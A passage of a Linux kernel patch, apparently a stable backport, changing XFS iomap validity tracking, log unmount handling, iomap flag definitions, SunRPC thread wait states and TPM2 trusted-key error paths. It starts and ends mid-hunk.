++				goto out_trans_cancel;
+ 		}
+ 	} else {
+ 		/*
+diff --git a/fs/xfs/xfs_ioctl.c b/fs/xfs/xfs_ioctl.c
+index 1f783e9796296..85fbb3b71d1c6 100644
+--- a/fs/xfs/xfs_ioctl.c
++++ b/fs/xfs/xfs_ioctl.c
+@@ -754,7 +754,7 @@ xfs_bulkstat_fmt(
+ static int
+ xfs_bulk_ireq_setup(
+ 	struct xfs_mount	*mp,
+-	struct xfs_bulk_ireq	*hdr,
++	const struct xfs_bulk_ireq *hdr,
+ 	struct xfs_ibulk	*breq,
+ 	void __user		*ubuffer)
+ {
+@@ -780,7 +780,7 @@ xfs_bulk_ireq_setup(
+ 
+ 		switch (hdr->ino) {
+ 		case XFS_BULK_IREQ_SPECIAL_ROOT:
+-			hdr->ino = mp->m_sb.sb_rootino;
++			breq->startino = mp->m_sb.sb_rootino;
+ 			break;
+ 		default:
+ 			return -EINVAL;
+diff --git a/fs/xfs/xfs_iomap.c b/fs/xfs/xfs_iomap.c
+index 07da03976ec12..ab5512c0bcf7a 100644
+--- a/fs/xfs/xfs_iomap.c
++++ b/fs/xfs/xfs_iomap.c
+@@ -48,13 +48,45 @@ xfs_alert_fsblock_zero(
+ 	return -EFSCORRUPTED;
+ }
+ 
++u64
++xfs_iomap_inode_sequence(
++	struct xfs_inode	*ip,
++	u16			iomap_flags)
++{
++	u64			cookie = 0;
++
++	if (iomap_flags & IOMAP_F_XATTR)
++		return READ_ONCE(ip->i_af.if_seq);
++	if ((iomap_flags & IOMAP_F_SHARED) && ip->i_cowfp)
++		cookie = (u64)READ_ONCE(ip->i_cowfp->if_seq) << 32;
++	return cookie | READ_ONCE(ip->i_df.if_seq);
++}
++
++/*
++ * Check that the iomap passed to us is still valid for the given offset and
++ * length.
++ */
++static bool
++xfs_iomap_valid(
++	struct inode		*inode,
++	const struct iomap	*iomap)
++{
++	return iomap->validity_cookie ==
++			xfs_iomap_inode_sequence(XFS_I(inode), iomap->flags);
++}
++
++const struct iomap_page_ops xfs_iomap_page_ops = {
++	.iomap_valid		= xfs_iomap_valid,
++};
++
+ int
+ xfs_bmbt_to_iomap(
+ 	struct xfs_inode	*ip,
+ 	struct iomap		*iomap,
+ 	struct xfs_bmbt_irec	*imap,
+ 	unsigned int		mapping_flags,
+-	u16			iomap_flags)
++	u16			iomap_flags,
++	u64			sequence_cookie)
+ {
+ 	struct xfs_mount	*mp = ip->i_mount;
+ 	struct xfs_buftarg	*target = xfs_inode_buftarg(ip);
+@@ -91,6 +123,9 @@ xfs_bmbt_to_iomap(
+ 	if (xfs_ipincount(ip) &&
+ 	    (ip->i_itemp->ili_fsync_fields & ~XFS_ILOG_TIMESTAMP))
+ 		iomap->flags |= IOMAP_F_DIRTY;
++
++	iomap->validity_cookie = sequence_cookie;
++	iomap->page_ops = &xfs_iomap_page_ops;
+ 	return 0;
+ }
+ 
+@@ -195,7 +230,8 @@ xfs_iomap_write_direct(
+ 	xfs_fileoff_t		offset_fsb,
+ 	xfs_fileoff_t		count_fsb,
+ 	unsigned int		flags,
+-	struct xfs_bmbt_irec	*imap)
++	struct xfs_bmbt_irec	*imap,
++	u64			*seq)
+ {
+ 	struct xfs_mount	*mp = ip->i_mount;
+ 	struct xfs_trans	*tp;
+@@ -285,6 +321,7 @@ xfs_iomap_write_direct(
+ 		error = xfs_alert_fsblock_zero(ip, imap);
+ 
+ out_unlock:
++	*seq = xfs_iomap_inode_sequence(ip, 0);
+ 	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 	return error;
+ 
+@@ -743,6 +780,7 @@ xfs_direct_write_iomap_begin(
+ 	bool			shared = false;
+ 	u16			iomap_flags = 0;
+ 	unsigned int		lockmode = XFS_ILOCK_SHARED;
++	u64			seq;
+ 
+ 	ASSERT(flags & (IOMAP_WRITE | IOMAP_ZERO));
+ 
+@@ -811,9 +849,10 @@ xfs_direct_write_iomap_begin(
+ 			goto out_unlock;
+ 	}
+ 
++	seq = xfs_iomap_inode_sequence(ip, iomap_flags);
+ 	xfs_iunlock(ip, lockmode);
+ 	trace_xfs_iomap_found(ip, offset, length, XFS_DATA_FORK, &imap);
+-	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, iomap_flags);
++	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, iomap_flags, seq);
+ 
+ allocate_blocks:
+ 	error = -EAGAIN;
+@@ -839,24 +878,26 @@ xfs_direct_write_iomap_begin(
+ 	xfs_iunlock(ip, lockmode);
+ 
+ 	error = xfs_iomap_write_direct(ip, offset_fsb, end_fsb - offset_fsb,
+-			flags, &imap);
++			flags, &imap, &seq);
+ 	if (error)
+ 		return error;
+ 
+ 	trace_xfs_iomap_alloc(ip, offset, length, XFS_DATA_FORK, &imap);
+ 	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags,
+-				 iomap_flags | IOMAP_F_NEW);
++				 iomap_flags | IOMAP_F_NEW, seq);
+ 
+ out_found_cow:
+-	xfs_iunlock(ip, lockmode);
+ 	length = XFS_FSB_TO_B(mp, cmap.br_startoff + cmap.br_blockcount);
+ 	trace_xfs_iomap_found(ip, offset, length - offset, XFS_COW_FORK, &cmap);
+ 	if (imap.br_startblock != HOLESTARTBLOCK) {
+-		error = xfs_bmbt_to_iomap(ip, srcmap, &imap, flags, 0);
++		seq = xfs_iomap_inode_sequence(ip, 0);
++		error = xfs_bmbt_to_iomap(ip, srcmap, &imap, flags, 0, seq);
+ 		if (error)
+-			return error;
++			goto out_unlock;
+ 	}
+-	return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags, IOMAP_F_SHARED);
++	seq = xfs_iomap_inode_sequence(ip, IOMAP_F_SHARED);
++	xfs_iunlock(ip, lockmode);
++	return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags, IOMAP_F_SHARED, seq);
+ 
+ out_unlock:
+ 	if (lockmode)
+@@ -915,6 +956,7 @@ xfs_buffered_write_iomap_begin(
+ 	int			allocfork = XFS_DATA_FORK;
+ 	int			error = 0;
+ 	unsigned int		lockmode = XFS_ILOCK_EXCL;
++	u64			seq;
+ 
+ 	if (xfs_is_shutdown(mp))
+ 		return -EIO;
+@@ -926,6 +968,10 @@ xfs_buffered_write_iomap_begin(
+ 
+ 	ASSERT(!XFS_IS_REALTIME_INODE(ip));
+ 
++	error = xfs_qm_dqattach(ip);
++	if (error)
++		return error;
++
+ 	error = xfs_ilock_for_iomap(ip, flags, &lockmode);
+ 	if (error)
+ 		return error;
+@@ -1029,10 +1075,6 @@ xfs_buffered_write_iomap_begin(
+ 			allocfork = XFS_COW_FORK;
+ 	}
+ 
+-	error = xfs_qm_dqattach_locked(ip, false);
+-	if (error)
+-		goto out_unlock;
+-
+ 	if (eof && offset + count > XFS_ISIZE(ip)) {
+ 		/*
+ 		 * Determine the initial size of the preallocation.
+@@ -1094,32 +1136,47 @@ xfs_buffered_write_iomap_begin(
+ 	 * Flag newly allocated delalloc blocks with IOMAP_F_NEW so we punch
+ 	 * them out if the write happens to fail.
+ 	 */
++	seq = xfs_iomap_inode_sequence(ip, IOMAP_F_NEW);
+ 	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 	trace_xfs_iomap_alloc(ip, offset, count, allocfork, &imap);
+-	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, IOMAP_F_NEW);
++	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, IOMAP_F_NEW, seq);
+ 
+ found_imap:
++	seq = xfs_iomap_inode_sequence(ip, 0);
+ 	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+-	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0);
++	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0, seq);
+ 
+ found_cow:
+-	xfs_iunlock(ip, XFS_ILOCK_EXCL);
++	seq = xfs_iomap_inode_sequence(ip, 0);
+ 	if (imap.br_startoff <= offset_fsb) {
+-		error = xfs_bmbt_to_iomap(ip, srcmap, &imap, flags, 0);
++		error = xfs_bmbt_to_iomap(ip, srcmap, &imap, flags, 0, seq);
+ 		if (error)
+-			return error;
++			goto out_unlock;
++		seq = xfs_iomap_inode_sequence(ip, IOMAP_F_SHARED);
++		xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 		return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags,
+-					 IOMAP_F_SHARED);
++					 IOMAP_F_SHARED, seq);
+ 	}
+ 
+ 	xfs_trim_extent(&cmap, offset_fsb, imap.br_startoff - offset_fsb);
+-	return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags, 0);
++	xfs_iunlock(ip, XFS_ILOCK_EXCL);
++	return xfs_bmbt_to_iomap(ip, iomap, &cmap, flags, 0, seq);
+ 
+ out_unlock:
+ 	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 	return error;
+ }
+ 
++static int
++xfs_buffered_write_delalloc_punch(
++	struct inode		*inode,
++	loff_t			offset,
++	loff_t			length)
++{
++	return xfs_bmap_punch_delalloc_range(XFS_I(inode), offset,
++			offset + length);
++}
++
+ static int
+ xfs_buffered_write_iomap_end(
+ 	struct inode		*inode,
+@@ -1129,56 +1186,17 @@ xfs_buffered_write_iomap_end(
+ 	unsigned		flags,
+ 	struct iomap		*iomap)
+ {
+-	struct xfs_inode	*ip = XFS_I(inode);
+-	struct xfs_mount	*mp = ip->i_mount;
+-	xfs_fileoff_t		start_fsb;
+-	xfs_fileoff_t		end_fsb;
+-	int			error = 0;
+-
+-	if (iomap->type != IOMAP_DELALLOC)
+-		return 0;
+-
+-	/*
+-	 * Behave as if the write failed if drop writes is enabled. Set the NEW
+-	 * flag to force delalloc cleanup.
+-	 */
+-	if (XFS_TEST_ERROR(false, mp, XFS_ERRTAG_DROP_WRITES)) {
+-		iomap->flags |= IOMAP_F_NEW;
+-		written = 0;
+-	}
+ 
+-	/*
+-	 * start_fsb refers to the first unused block after a short write. If
+-	 * nothing was written, round offset down to point at the first block in
+-	 * the range.
+-	 */
+-	if (unlikely(!written))
+-		start_fsb = XFS_B_TO_FSBT(mp, offset);
+-	else
+-		start_fsb = XFS_B_TO_FSB(mp, offset + written);
+-	end_fsb = XFS_B_TO_FSB(mp, offset + length);
++	struct xfs_mount	*mp = XFS_M(inode->i_sb);
++	int			error;
+ 
+-	/*
+-	 * Trim delalloc blocks if they were allocated by this write and we
+-	 * didn't manage to write the whole range.
+-	 *
+-	 * We don't need to care about racing delalloc as we hold i_mutex
+-	 * across the reserve/allocate/unreserve calls. If there are delalloc
+-	 * blocks in the range, they are ours.
+-	 */
+-	if ((iomap->flags & IOMAP_F_NEW) && start_fsb < end_fsb) {
+-		truncate_pagecache_range(VFS_I(ip), XFS_FSB_TO_B(mp, start_fsb),
+-					 XFS_FSB_TO_B(mp, end_fsb) - 1);
+-
+-		error = xfs_bmap_punch_delalloc_range(ip, start_fsb,
+-					       end_fsb - start_fsb);
+-		if (error && !xfs_is_shutdown(mp)) {
+-			xfs_alert(mp, "%s: unable to clean up ino %lld",
+-				__func__, ip->i_ino);
+-			return error;
+-		}
++	error = iomap_file_buffered_write_punch_delalloc(inode, iomap, offset,
++			length, written, &xfs_buffered_write_delalloc_punch);
++	if (error && !xfs_is_shutdown(mp)) {
++		xfs_alert(mp, "%s: unable to clean up ino 0x%llx",
++			__func__, XFS_I(inode)->i_ino);
++		return error;
+ 	}
+-
+ 	return 0;
+ }
+ 
+@@ -1187,6 +1205,15 @@ const struct iomap_ops xfs_buffered_write_iomap_ops = {
+ 	.iomap_end		= xfs_buffered_write_iomap_end,
+ };
+ 
++/*
++ * iomap_page_mkwrite() will never fail in a way that requires delalloc extents
++ * that it allocated to be revoked. Hence we do not need an .iomap_end method
++ * for this operation.
++ */
++const struct iomap_ops xfs_page_mkwrite_iomap_ops = {
++	.iomap_begin		= xfs_buffered_write_iomap_begin,
++};
++
+ static int
+ xfs_read_iomap_begin(
+ 	struct inode		*inode,
+@@ -1204,6 +1231,7 @@ xfs_read_iomap_begin(
+ 	int			nimaps = 1, error = 0;
+ 	bool			shared = false;
+ 	unsigned int		lockmode = XFS_ILOCK_SHARED;
++	u64			seq;
+ 
+ 	ASSERT(!(flags & (IOMAP_WRITE | IOMAP_ZERO)));
+ 
+@@ -1217,13 +1245,14 @@ xfs_read_iomap_begin(
+ 			       &nimaps, 0);
+ 	if (!error && (flags & IOMAP_REPORT))
+ 		error = xfs_reflink_trim_around_shared(ip, &imap, &shared);
++	seq = xfs_iomap_inode_sequence(ip, shared ? IOMAP_F_SHARED : 0);
+ 	xfs_iunlock(ip, lockmode);
+ 
+ 	if (error)
+ 		return error;
+ 	trace_xfs_iomap_found(ip, offset, length, XFS_DATA_FORK, &imap);
+ 	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags,
+-				 shared ? IOMAP_F_SHARED : 0);
++				 shared ? IOMAP_F_SHARED : 0, seq);
+ }
+ 
+ const struct iomap_ops xfs_read_iomap_ops = {
+@@ -1248,6 +1277,7 @@ xfs_seek_iomap_begin(
+ 	struct xfs_bmbt_irec	imap, cmap;
+ 	int			error = 0;
+ 	unsigned		lockmode;
++	u64			seq;
+ 
+ 	if (xfs_is_shutdown(mp))
+ 		return -EIO;
+@@ -1282,8 +1312,9 @@ xfs_seek_iomap_begin(
+ 		if (data_fsb < cow_fsb + cmap.br_blockcount)
+ 			end_fsb = min(end_fsb, data_fsb);
+ 		xfs_trim_extent(&cmap, offset_fsb, end_fsb);
++		seq = xfs_iomap_inode_sequence(ip, IOMAP_F_SHARED);
+ 		error = xfs_bmbt_to_iomap(ip, iomap, &cmap, flags,
+-					  IOMAP_F_SHARED);
++				IOMAP_F_SHARED, seq);
+ 		/*
+ 		 * This is a COW extent, so we must probe the page cache
+ 		 * because there could be dirty page cache being backed
+@@ -1304,8 +1335,9 @@ xfs_seek_iomap_begin(
+ 	imap.br_startblock = HOLESTARTBLOCK;
+ 	imap.br_state = XFS_EXT_NORM;
+ done:
++	seq = xfs_iomap_inode_sequence(ip, 0);
+ 	xfs_trim_extent(&imap, offset_fsb, end_fsb);
+-	error = xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0);
++	error = xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0, seq);
+ out_unlock:
+ 	xfs_iunlock(ip, lockmode);
+ 	return error;
+@@ -1331,6 +1363,7 @@ xfs_xattr_iomap_begin(
+ 	struct xfs_bmbt_irec	imap;
+ 	int			nimaps = 1, error = 0;
+ 	unsigned		lockmode;
++	int			seq;
+ 
+ 	if (xfs_is_shutdown(mp))
+ 		return -EIO;
+@@ -1347,12 +1380,14 @@ xfs_xattr_iomap_begin(
+ 	error = xfs_bmapi_read(ip, offset_fsb, end_fsb - offset_fsb, &imap,
+ 			       &nimaps, XFS_BMAPI_ATTRFORK);
+ out_unlock:
++
++	seq = xfs_iomap_inode_sequence(ip, IOMAP_F_XATTR);
+ 	xfs_iunlock(ip, lockmode);
+ 
+ 	if (error)
+ 		return error;
+ 	ASSERT(nimaps);
+-	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, 0);
++	return xfs_bmbt_to_iomap(ip, iomap, &imap, flags, IOMAP_F_XATTR, seq);
+ }
+ 
+ const struct iomap_ops xfs_xattr_iomap_ops = {
+diff --git a/fs/xfs/xfs_iomap.h b/fs/xfs/xfs_iomap.h
+index c782e8c0479c0..4da13440bae9b 100644
+--- a/fs/xfs/xfs_iomap.h
++++ b/fs/xfs/xfs_iomap.h
+@@ -13,14 +13,15 @@ struct xfs_bmbt_irec;
+ 
+ int xfs_iomap_write_direct(struct xfs_inode *ip, xfs_fileoff_t offset_fsb,
+ 		xfs_fileoff_t count_fsb, unsigned int flags,
+-		struct xfs_bmbt_irec *imap);
++		struct xfs_bmbt_irec *imap, u64 *sequence);
+ int xfs_iomap_write_unwritten(struct xfs_inode *, xfs_off_t, xfs_off_t, bool);
+ xfs_fileoff_t xfs_iomap_eof_align_last_fsb(struct xfs_inode *ip,
+ 		xfs_fileoff_t end_fsb);
+ 
++u64 xfs_iomap_inode_sequence(struct xfs_inode *ip, u16 iomap_flags);
+ int xfs_bmbt_to_iomap(struct xfs_inode *ip, struct iomap *iomap,
+ 		struct xfs_bmbt_irec *imap, unsigned int mapping_flags,
+-		u16 iomap_flags);
++		u16 iomap_flags, u64 sequence_cookie);
+ 
+ int xfs_zero_range(struct xfs_inode *ip, loff_t pos, loff_t len,
+ 		bool *did_zero);
+@@ -47,6 +48,7 @@ xfs_aligned_fsb_count(
+ }
+ 
+ extern const struct iomap_ops xfs_buffered_write_iomap_ops;
++extern const struct iomap_ops xfs_page_mkwrite_iomap_ops;
+ extern const struct iomap_ops xfs_direct_write_iomap_ops;
+ extern const struct iomap_ops xfs_read_iomap_ops;
+ extern const struct iomap_ops xfs_seek_iomap_ops;
+diff --git a/fs/xfs/xfs_log.c b/fs/xfs/xfs_log.c
+index f02a0dd522b3d..d9aa5eab02c3f 100644
+--- a/fs/xfs/xfs_log.c
++++ b/fs/xfs/xfs_log.c
+@@ -730,15 +730,7 @@ xfs_log_mount(
+ 	 * just worked.
+ 	 */
+ 	if (!xfs_has_norecovery(mp)) {
+-		/*
+-		 * log recovery ignores readonly state and so we need to clear
+-		 * mount-based read only state so it can write to disk.
+-		 */
+-		bool	readonly = test_and_clear_bit(XFS_OPSTATE_READONLY,
+-						&mp->m_opstate);
+ 		error = xlog_recover(log);
+-		if (readonly)
+-			set_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
+ 		if (error) {
+ 			xfs_warn(mp, "log mount/recovery failed: error %d",
+ 				error);
+@@ -787,7 +779,6 @@ xfs_log_mount_finish(
+ 	struct xfs_mount	*mp)
+ {
+ 	struct xlog		*log = mp->m_log;
+-	bool			readonly;
+ 	int			error = 0;
+ 
+ 	if (xfs_has_norecovery(mp)) {
+@@ -795,12 +786,6 @@ xfs_log_mount_finish(
+ 		return 0;
+ 	}
+ 
+-	/*
+-	 * log recovery ignores readonly state and so we need to clear
+-	 * mount-based read only state so it can write to disk.
+-	 */
+-	readonly = test_and_clear_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
+-
+ 	/*
+ 	 * During the second phase of log recovery, we need iget and
+ 	 * iput to behave like they do for an active filesystem.
+@@ -850,8 +835,6 @@ xfs_log_mount_finish(
+ 	xfs_buftarg_drain(mp->m_ddev_targp);
+ 
+ 	clear_bit(XLOG_RECOVERY_NEEDED, &log->l_opstate);
+-	if (readonly)
+-		set_bit(XFS_OPSTATE_READONLY, &mp->m_opstate);
+ 
+ 	/* Make sure the log is dead if we're returning failure. */
+ 	ASSERT(!error || xlog_is_shutdown(log));
+@@ -886,6 +869,23 @@ xlog_force_iclog(
+ 	return xlog_state_release_iclog(iclog->ic_log, iclog, NULL);
+ }
+ 
++/*
++ * Cycle all the iclogbuf locks to make sure all log IO completion
++ * is done before we tear down these buffers.
++ */
++static void
++xlog_wait_iclog_completion(struct xlog *log)
++{
++	int		i;
++	struct xlog_in_core	*iclog = log->l_iclog;
++
++	for (i = 0; i < log->l_iclog_bufs; i++) {
++		down(&iclog->ic_sema);
++		up(&iclog->ic_sema);
++		iclog = iclog->ic_next;
++	}
++}
++
+ /*
+  * Wait for the iclog and all prior iclogs to be written disk as required by the
+  * log force state machine. Waiting on ic_force_wait ensures iclog completions
+@@ -1111,6 +1111,14 @@ xfs_log_unmount(
+ {
+ 	xfs_log_clean(mp);
+ 
++	/*
++	 * If shutdown has come from iclog IO context, the log
++	 * cleaning will have been skipped and so we need to wait
++	 * for the iclog to complete shutdown processing before we
++	 * tear anything down.
++	 */
++	xlog_wait_iclog_completion(mp->m_log);
++
+ 	xfs_buftarg_drain(mp->m_ddev_targp);
+ 
+ 	xfs_trans_ail_destroy(mp);
+@@ -2113,17 +2121,6 @@ xlog_dealloc_log(
+ 	xlog_in_core_t	*iclog, *next_iclog;
+ 	int		i;
+ 
+-	/*
+-	 * Cycle all the iclogbuf locks to make sure all log IO completion
+-	 * is done before we tear down these buffers.
+-	 */
+-	iclog = log->l_iclog;
+-	for (i = 0; i < log->l_iclog_bufs; i++) {
+-		down(&iclog->ic_sema);
+-		up(&iclog->ic_sema);
+-		iclog = iclog->ic_next;
+-	}
+-
+ 	/*
+ 	 * Destroy the CIL after waiting for iclog IO completion because an
+ 	 * iclog EIO error will try to shut down the log, which accesses the
+diff --git a/fs/xfs/xfs_mount.c b/fs/xfs/xfs_mount.c
+index e8bb3c2e847e1..fb87ffb48f7fe 100644
+--- a/fs/xfs/xfs_mount.c
++++ b/fs/xfs/xfs_mount.c
+@@ -538,6 +538,20 @@ xfs_check_summary_counts(
+ 	return 0;
+ }
+ 
++static void
++xfs_unmount_check(
++	struct xfs_mount	*mp)
++{
++	if (xfs_is_shutdown(mp))
++		return;
++
++	if (percpu_counter_sum(&mp->m_ifree) >
++			percpu_counter_sum(&mp->m_icount)) {
++		xfs_alert(mp, "ifree/icount mismatch at unmount");
++		xfs_fs_mark_sick(mp, XFS_SICK_FS_COUNTERS);
++	}
++}
++
+ /*
+  * Flush and reclaim dirty inodes in preparation for unmount. Inodes and
+  * internal inode structures can be sitting in the CIL and AIL at this point,
+@@ -1077,6 +1091,7 @@ xfs_unmountfs(
+ 	if (error)
+ 		xfs_warn(mp, "Unable to free reserved block pool. "
+ 				"Freespace may not be correct on next mount.");
++	xfs_unmount_check(mp);
+ 
+ 	xfs_log_unmount(mp);
+ 	xfs_da_unmount(mp);
+diff --git a/fs/xfs/xfs_pnfs.c b/fs/xfs/xfs_pnfs.c
+index 37a24f0f7cd40..38d23f0e703a8 100644
+--- a/fs/xfs/xfs_pnfs.c
++++ b/fs/xfs/xfs_pnfs.c
+@@ -125,6 +125,7 @@ xfs_fs_map_blocks(
+ 	int			nimaps = 1;
+ 	uint			lock_flags;
+ 	int			error = 0;
++	u64			seq;
+ 
+ 	if (xfs_is_shutdown(mp))
+ 		return -EIO;
+@@ -176,6 +177,7 @@ xfs_fs_map_blocks(
+ 	lock_flags = xfs_ilock_data_map_shared(ip);
+ 	error = xfs_bmapi_read(ip, offset_fsb, end_fsb - offset_fsb,
+ 				&imap, &nimaps, bmapi_flags);
++	seq = xfs_iomap_inode_sequence(ip, 0);
+ 
+ 	ASSERT(!nimaps || imap.br_startblock != DELAYSTARTBLOCK);
+ 
+@@ -189,7 +191,7 @@ xfs_fs_map_blocks(
+ 		xfs_iunlock(ip, lock_flags);
+ 
+ 		error = xfs_iomap_write_direct(ip, offset_fsb,
+-				end_fsb - offset_fsb, 0, &imap);
++				end_fsb - offset_fsb, 0, &imap, &seq);
+ 		if (error)
+ 			goto out_unlock;
+ 
+@@ -209,7 +211,7 @@ xfs_fs_map_blocks(
+ 	}
+ 	xfs_iunlock(ip, XFS_IOLOCK_EXCL);
+ 
+-	error = xfs_bmbt_to_iomap(ip, iomap, &imap, 0, 0);
++	error = xfs_bmbt_to_iomap(ip, iomap, &imap, 0, 0, seq);
+ 	*device_generation = mp->m_generation;
+ 	return error;
+ out_unlock:
+diff --git a/include/linux/iomap.h b/include/linux/iomap.h
+index 238a03087e17e..0983dfc9a203c 100644
+--- a/include/linux/iomap.h
++++ b/include/linux/iomap.h
+@@ -49,26 +49,35 @@ struct vm_fault;
+  *
+  * IOMAP_F_BUFFER_HEAD indicates that the file system requires the use of
+  * buffer heads for this mapping.
++ *
++ * IOMAP_F_XATTR indicates that the iomap is for an extended attribute extent
++ * rather than a file data extent.
+  */
+-#define IOMAP_F_NEW		0x01
+-#define IOMAP_F_DIRTY		0x02
+-#define IOMAP_F_SHARED		0x04
+-#define IOMAP_F_MERGED		0x08
+-#define IOMAP_F_BUFFER_HEAD	0x10
+-#define IOMAP_F_ZONE_APPEND	0x20
++#define IOMAP_F_NEW		(1U << 0)
++#define IOMAP_F_DIRTY		(1U << 1)
++#define IOMAP_F_SHARED		(1U << 2)
++#define IOMAP_F_MERGED		(1U << 3)
++#define IOMAP_F_BUFFER_HEAD	(1U << 4)
++#define IOMAP_F_ZONE_APPEND	(1U << 5)
++#define IOMAP_F_XATTR		(1U << 6)
+ 
+ /*
+  * Flags set by the core iomap code during operations:
+  *
+  * IOMAP_F_SIZE_CHANGED indicates to the iomap_end method that the file size
+  * has changed as the result of this write operation.
++ *
++ * IOMAP_F_STALE indicates that the iomap is not valid any longer and the file
++ * range it covers needs to be remapped by the high level before the operation
++ * can proceed.
+  */
+-#define IOMAP_F_SIZE_CHANGED	0x100
++#define IOMAP_F_SIZE_CHANGED	(1U << 8)
++#define IOMAP_F_STALE		(1U << 9)
+ 
+ /*
+  * Flags from 0x1000 up are for file system specific usage:
+  */
+-#define IOMAP_F_PRIVATE		0x1000
++#define IOMAP_F_PRIVATE		(1U << 12)
+ 
+ 
+ /*
+@@ -89,6 +98,7 @@ struct iomap {
+ 	void			*inline_data;
+ 	void			*private; /* filesystem private */
+ 	const struct iomap_page_ops *page_ops;
++	u64			validity_cookie; /* used with .iomap_valid() */
+ };
+ 
+ static inline sector_t iomap_sector(const struct iomap *iomap, loff_t pos)
+@@ -128,6 +138,23 @@ struct iomap_page_ops {
+ 	int (*page_prepare)(struct inode *inode, loff_t pos, unsigned len);
+ 	void (*page_done)(struct inode *inode, loff_t pos, unsigned copied,
+ 			struct page *page);
++
++	/*
++	 * Check that the cached iomap still maps correctly to the filesystem's
++	 * internal extent map. FS internal extent maps can change while iomap
++	 * is iterating a cached iomap, so this hook allows iomap to detect that
++	 * the iomap needs to be refreshed during a long running write
++	 * operation.
++	 *
++	 * The filesystem can store internal state (e.g. a sequence number) in
++	 * iomap->validity_cookie when the iomap is first mapped to be able to
++	 * detect changes between mapping time and whenever .iomap_valid() is
++	 * called.
++	 *
++	 * This is called with the folio over the specified file position held
++	 * locked by the iomap code.
++	 */
++	bool (*iomap_valid)(struct inode *inode, const struct iomap *iomap);
+ };
+ 
+ /*
+@@ -226,6 +253,10 @@ static inline const struct iomap *iomap_iter_srcmap(const struct iomap_iter *i)
+ 
+ ssize_t iomap_file_buffered_write(struct kiocb *iocb, struct iov_iter *from,
+ 		const struct iomap_ops *ops);
++int iomap_file_buffered_write_punch_delalloc(struct inode *inode,
++		struct iomap *iomap, loff_t pos, loff_t length, ssize_t written,
++		int (*punch)(struct inode *inode, loff_t pos, loff_t length));
++
+ int iomap_read_folio(struct folio *folio, const struct iomap_ops *ops);
+ void iomap_readahead(struct readahead_control *, const struct iomap_ops *ops);
+ bool iomap_is_partially_uptodate(struct folio *, size_t from, size_t count);
+diff --git a/net/sunrpc/svc_xprt.c b/net/sunrpc/svc_xprt.c
+index 8117d0e08d5a2..1393eefbf2187 100644
+--- a/net/sunrpc/svc_xprt.c
++++ b/net/sunrpc/svc_xprt.c
+@@ -696,8 +696,8 @@ static int svc_alloc_arg(struct svc_rqst *rqstp)
+ 			/* Made progress, don't sleep yet */
+ 			continue;
+ 
+-		set_current_state(TASK_INTERRUPTIBLE);
+-		if (signalled() || kthread_should_stop()) {
++		set_current_state(TASK_IDLE);
++		if (kthread_should_stop()) {
+ 			set_current_state(TASK_RUNNING);
+ 			return -EINTR;
+ 		}
+@@ -733,7 +733,7 @@ rqst_should_sleep(struct svc_rqst *rqstp)
+ 		return false;
+ 
+ 	/* are we shutting down? */
+-	if (signalled() || kthread_should_stop())
++	if (kthread_should_stop())
+ 		return false;
+ 
+ 	/* are we freezing? */
+@@ -755,11 +755,7 @@ static struct svc_xprt *svc_get_next_xprt(struct svc_rqst *rqstp, long timeout)
+ 	if (rqstp->rq_xprt)
+ 		goto out_found;
+ 
+-	/*
+-	 * We have to be able to interrupt this wait
+-	 * to bring down the daemons ...
+-	 */
+-	set_current_state(TASK_INTERRUPTIBLE);
++	set_current_state(TASK_IDLE);
+ 	smp_mb__before_atomic();
+ 	clear_bit(SP_CONGESTED, &pool->sp_flags);
+ 	clear_bit(RQ_BUSY, &rqstp->rq_flags);
+@@ -781,7 +777,7 @@ static struct svc_xprt *svc_get_next_xprt(struct svc_rqst *rqstp, long timeout)
+ 	if (!time_left)
+ 		atomic_long_inc(&pool->sp_stats.threads_timedout);
+ 
+-	if (signalled() || kthread_should_stop())
++	if (kthread_should_stop())
+ 		return ERR_PTR(-EINTR);
+ 	return ERR_PTR(-EAGAIN);
+ out_found:
+@@ -879,7 +875,7 @@ int svc_recv(struct svc_rqst *rqstp, long timeout)
+ 	try_to_freeze();
+ 	cond_resched();
+ 	err = -EINTR;
+-	if (signalled() || kthread_should_stop())
++	if (kthread_should_stop())
+ 		goto out;
+ 
+ 	xprt = svc_get_next_xprt(rqstp, timeout);
+diff --git a/security/keys/trusted-keys/trusted_tpm2.c b/security/keys/trusted-keys/trusted_tpm2.c
+index bc700f85f80be..ea277c55a38db 100644
+--- a/security/keys/trusted-keys/trusted_tpm2.c
++++ b/security/keys/trusted-keys/trusted_tpm2.c
+@@ -38,6 +38,7 @@ static int tpm2_key_encode(struct trusted_key_payload *payload,
+ 	u8 *end_work = scratch + SCRATCH_SIZE;
+ 	u8 *priv, *pub;
+ 	u16 priv_len, pub_len;
++	int ret;
+ 
+ 	priv_len = get_unaligned_be16(src) + 2;
+ 	priv = src;
+@@ -57,8 +58,10 @@ static int tpm2_key_encode(struct trusted_key_payload *payload,
+ 		unsigned char bool[3], *w = bool;
+ 		/* tag 0 is emptyAuth */
+ 		w = asn1_encode_boolean(w, w + sizeof(bool), true);
+-		if (WARN(IS_ERR(w), "BUG: Boolean failed to encode"))
+-			return PTR_ERR(w);
++		if (WARN(IS_ERR(w), "BUG: Boolean failed to encode")) {
++			ret = PTR_ERR(w);
++			goto err;
++		}
+ 		work = asn1_encode_tag(work, end_work, 0, bool, w - bool);
+ 	}
+ 
+@@ -69,8 +72,10 @@ static int tpm2_key_encode(struct trusted_key_payload *payload,
